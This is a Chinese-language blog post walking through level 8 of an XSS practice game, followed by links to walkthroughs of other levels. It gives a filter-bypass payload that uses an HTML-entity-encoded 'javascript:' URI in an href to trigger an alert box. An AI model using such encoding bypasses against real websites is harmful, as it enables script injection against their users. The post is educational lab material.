开发者社区云计算文章正文

XSS-Game level 8

2021-12-30 107

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 第八关过滤的很严 , 只能编码绕过了

第八关过滤的很严 , 只能编码绕过了

源码中过滤了大小写,替换了script , on 事件和一些属性 , 而后将参数拼接到 href 属性

我们使用编码绕过 s 编码后为 s , payload

java&#115;cript:alert(8)

<a href="'.$str7.'">    //拼接前
<a href="java&#115;cript:alert(8)">    //拼接后
<a href="javascript:alert(8)">    //编码后

点击友情链接 , 触发弹窗 , 过关

士别三日wyx

myysophia

11月前

Pingdom Website Speed Test

在Pingdom输入 URL 地址，即可测试页面加载速度，分析并找出性能瓶颈。帮助用户找出影响网站速度的原因，并给出改善网页性能的可行性方案，很适合做网站的用户。

myysophia

41 0 0

游客rigajubvzf2hs

编解码并行计算

wrf--运行real.exe时报错：“Could not find level above ground“ error

在修改wrf初始场资料时，如果做了带通滤波处理，会发现在运行real.exe时报错：“Could not find level above ground” error 。

游客rigajubvzf2hs

226 0 0

wrf--运行real.exe时报错：“Could not find level above ground“ error

士别三日wyx

JavaScript 前端开发

XSS-Game Level1

第一关算是送分题 , 没有任何过滤 , 传递一个弹窗的JS脚本即可

士别三日wyx

193 0 0

士别三日wyx

XSS-Game level 9

第九关过滤的很严 , 使用编码绕过

士别三日wyx

89 0 0

士别三日wyx

XSS-Game level 13

第十三关利用 COOKIE 使用事件绕过

士别三日wyx

105 0 0

士别三日wyx

XSS-Game level 6

第六关未过滤大小写 , 使用大小写绕过

士别三日wyx

89 0 0

士别三日wyx

XSS-Game Level 4

第四关过滤了左右尖括号 ">","<" , 我们使用事件来绕过

士别三日wyx

117 0 0

士别三日wyx

XSS-Game level 10

第十关过滤了尖括号 > < , 并且隐藏了输入框 , 使用事件绕过,并使输入框取消隐藏

士别三日wyx

69 0 0

士别三日wyx

JavaScript

XSS-Game Level 2

第二关将结果拼接到了value属性中 , 我们插入JS脚本时手动闭合双引号即可

士别三日wyx

103 0 0

士别三日wyx

XSS-Game level 12

第十二关利用 HTTP_USER_AGENT 通过点击事件绕过

士别三日wyx

119 0 0

XSS-Game level 8

热门文章

最新文章

相关电子书